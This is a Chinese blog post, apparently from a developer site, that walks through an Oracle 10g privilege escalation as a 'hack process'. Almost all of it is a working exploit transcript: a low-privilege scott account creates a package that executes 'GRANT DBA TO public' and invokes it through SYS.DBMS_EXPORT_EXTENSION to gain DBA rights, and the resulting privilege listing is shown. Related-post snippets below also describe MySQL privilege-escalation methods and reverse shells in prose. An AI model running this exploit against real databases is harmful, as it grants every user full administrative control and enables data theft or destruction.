oracle提升,Oracle特权提升

最新推荐文章于 2024-03-24 09:44:27 发布
最新推荐文章于 2024-03-24 09:44:27 发布
阅读量71 收藏
点赞数
文章标签: oracle提升

以下为hack过程 Microsoft Windows [版本 5.2.3790] C:\Documents and Settings\Administratorsqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连

以下为hack过程

Microsoft Windows [版本 5.2.3790]

C:\Documents and Settings\Administrator>sqlplus scott/tiger

SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:

Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production

With the Partitioning, OLAP and Data Mining options

SQL> select * from session_privs;

PRIVILEGE

--------------------------------------------------------------------------------

CREATE SESSION

CREATE TABLE

CREATE CLUSTER

CREATE SEQUENCE

CREATE PROCEDURE

CREATE TRIGGER

CREATE TYPE

CREATE OPERATOR

CREATE INDEXTYPE

已选择9行。

SQL> CREATE OR REPLACE

2 PACKAGE MYBADPACKAGE authid current_user

3 IS

4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3

5 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)

6 RETURN NUMBER;

7 END;

8 /

程序包已创建。

SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE

2 IS

3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3

4 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)

5 RETURN NUMBER

6 IS

7 BEGIN

8 EXECUTE IMMEDIATE 'GRANT DBA TO public';

9 RETURN 1;

10 EXCEPTION WHEN OTHERS THEN

11 EXECUTE IMMEDIATE 'GRANT DBA TO public';

12 return 1;

13 END;

14 END;

15 /

程序包体已创建。

SQL> DECLARE

2 INDEX_NAME VARCHAR2(200);

3 INDEX_SCHEMA VARCHAR2(200);

4 TYPE_NAME VARCHAR2(200);

5 TYPE_SCHEMA VARCHAR2(200);

6 VERSION VARCHAR2(200);

7 NEWBLOCK PLS_INTEGER;

8 GMFLAGS NUMBER;

9 v_Return VARCHAR2(200);

10 BEGIN

11 INDEX_NAME := 'A1'; INDEX_SCHEMA := 'SCOTT';

12 TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'SCOTT';

13 VERSION := '10.2.0.1.0'; GMFLAGS := 1;

14 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(

15 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME

16 => TYPE_NAME,

17 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>

18 NEWBLOCK, GMFLAGS => GMFLAGS

19 );

20 END;

21 /

PL/SQL 过程已成功完成。

SQL> create user qwe identified by qwe;

create user qwe identified by qwe

*

第 1 行出现错误:

ORA-01031: 权限不足

SQL> set role dba

2 /

角色集

SQL> create user qwe identified by qwe;

用户已创建。

SQL> select * from session_privs;

PRIVILEGE

--------------------------------------------------------------------------------

ALTER SYSTEM

AUDIT SYSTEM

CREATE SESSION

ALTER SESSION

RESTRICTED SESSION

CREATE TABLESPACE

ALTER TABLESPACE

MANAGE TABLESPACE

DROP TABLESPACE

UNLIMITED TABLESPACE

CREATE USER

PRIVILEGE

--------------------------------------------------------------------------------

BECOME USER

.......

经测试,oracle10.2.0.4以上版本没这个安全漏洞

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

leeloo deng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle-数据库保护.ppt
11-21
Oracle-数据库保护】是Oracle数据库管理中的重要环节,旨在确保数据的安全性、...实践中,解决难点如死锁检测、使用SQL创建和管理触发器,以及理解和应用LogMiner、RAC和ASM等技术,都是提升数据库管理技能的关键。
oracle实验报告
01-10
4、在复制的emp表中将雇员ALLEN提升为经理,工资增至$2500, 奖(佣 )金增加40%。 5、删除复制的emp表中工资低于500的记录行。 6、列出10号部门中既不是经理,也不是秘书的职工的所有信息。 7、查找出部门所在地是...
Oracle数据库提权(低权限提升至dba)
weixin_30642561的博客
04-23 432
0x01 Oracle存储过程”缺陷” 在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer和 invoker。 definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。 说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我...
小迪安全学习笔记(权限提升--MySQL数据库提权)(二)
weixin_63560942的博客
03-24 1158
首先获取MySQL数据库用户密码,可以用本地连接暴力猜解,或者读取敏感文件获取,最后使用工具输入IP和账号密码端口进行连接,MySQL数据库的提权方式有UDF,MOF提权,写入.dll(动态连接库)文件提权,也可以执行反弹shell文件进行MSF连接,还有写入启动任务再用DDos攻击强制服务器重启。
Oracle特权提升
liumengcheng的专栏
09-23 630
以下为hack过程 Microsoft Windows [版本 5.2.3790] (C) 版权所有 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator>sqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月
数据库权限提升
Williamanddog的博客
02-07 646
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展 MySQL的技术手段,可以说是数据库功能的一种扩展。用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,通过添加命令执行函数可以执行系统命令,从而进行提权。 UDF提权条件: 1)掌握的Mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,如root账户 2)Mysql版本大于5.1版本,udf.dll文件必
windows特权提升基础
Websec
04-15 687
参考文章:http://www.fuzzysecurity.com/tutorials/16.htmlhttp://mp.weixin.qq.com/s/JeYxI2usvJCwmijYEefmOw
Oracle Solaris 11.2 Developer's Guide to Oracle Solaris 11 Secu
06-20
Oracle Solaris 11.2 开发者指南:Oracle Solaris 11 安全性》是Oracle公司为开发者提供的一份详细的安全指南,旨在帮助开发人员...通过深入学习和实践,读者可以提升其在Oracle Solaris环境下的安全开发和管理能力。
Oracle用户(user)和表空间(tablespace).pdf
09-02
Oracle 数据库是一个强大的关系型数据库管理系统,其用户管理和表空间机制是数据库管理和操作的基础。本文主要探讨了 Oracle 用户...在实践中不断探索和学习,将有助于进一步提升Oracle 数据库管理领域的专业技能。
Oracle Database Readme 11gRelease2(11.2)-225
06-18
- **特权用户管理**:改进了权限和角色的管理,减少了DBA的权限滥用风险。 3. **性能监控与调优** - **自动工作负载仓库(AWR)**:提供了更丰富的性能报告和诊断工具,帮助识别性能瓶颈。 - **SQL性能分析器**:...
第60天-权限提升-MY&MS&ORA 等 SQL 数据库提权
MCTSOG的博客
04-29 2116
思维导图 权限提升 数据库提权 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。 数据库应用提权在权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法 目前数据库提权对应的技术及方法等 知识点 提权流程 服务探针---->信息收集----->提权利用----->获取权限 数据库端口号 关系型数
权限提升之——数据库提权
温柔小薛的博客
05-06 2756
数据库权限提升 这是这两天学习的哈,一篇篇发太麻烦了,就整理在一篇文章里了,整体感觉基本都是靠工具,不靠工具的还是都比较有难度的,五一假期过去了也该继续回到紧张的学习中了,冲鸭! 在家没衣服穿太可怜了,想回学校取衣服T_T 如何获取mysql账号密码 1.查看网站配置文件。 如:conn、config、data、sql、common 、inc等。 2.查看数据库安装路径下的mysql文件 安装目...
数据库特权
笔记
10-08 205
connect 允许用户连接数据库 bindadd 允许用户使用BIND命令创建新的程序包 inplicit_schema 允许用户使用CREATE语句带有一个不存在的模式名来创建数据库对象,从而隐式地创建一个模式 load 允许用户使用LOAD命令导数据 quiesce_connect 允许用户对于处理停顿状态的数据库进行访问. create_external_routine 允许用...
oracle普通用户提权,oracle 10g 漏洞--低权限用户提权方法
weixin_42150745的博客
04-04 508
oracle 低权限用户提权方法:【漏洞名称】 sys.dbms_export_extension.get_domain_index_metadata 提升权限漏洞【影响平台】Oracle 8i / 9i / 10g / XE【风险等级】高【攻击需求】较低权限账号【造成危害】取得管理员权限【内容描述】oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7,...
导入时候索引创建失败解决方法
az65381973的博客
02-15 3223
报错信息 Processing object type TABLE_EXPORT/TABLE/TABLE Processing object type TABLE_EXPORT/TABLE/TABLE_DATA . . imported "T24"."STF_TEM_CAR000"                      8.458 GB 11616355 rows Processing ob...
财务报表,项目费用支出明细.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ppap-第四版.pdf
08-09
ppap-第四版
铁路转辙机 ZD6 使用说明书
最新发布
08-09
铁路转辙机 ZD6 使用说明书
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值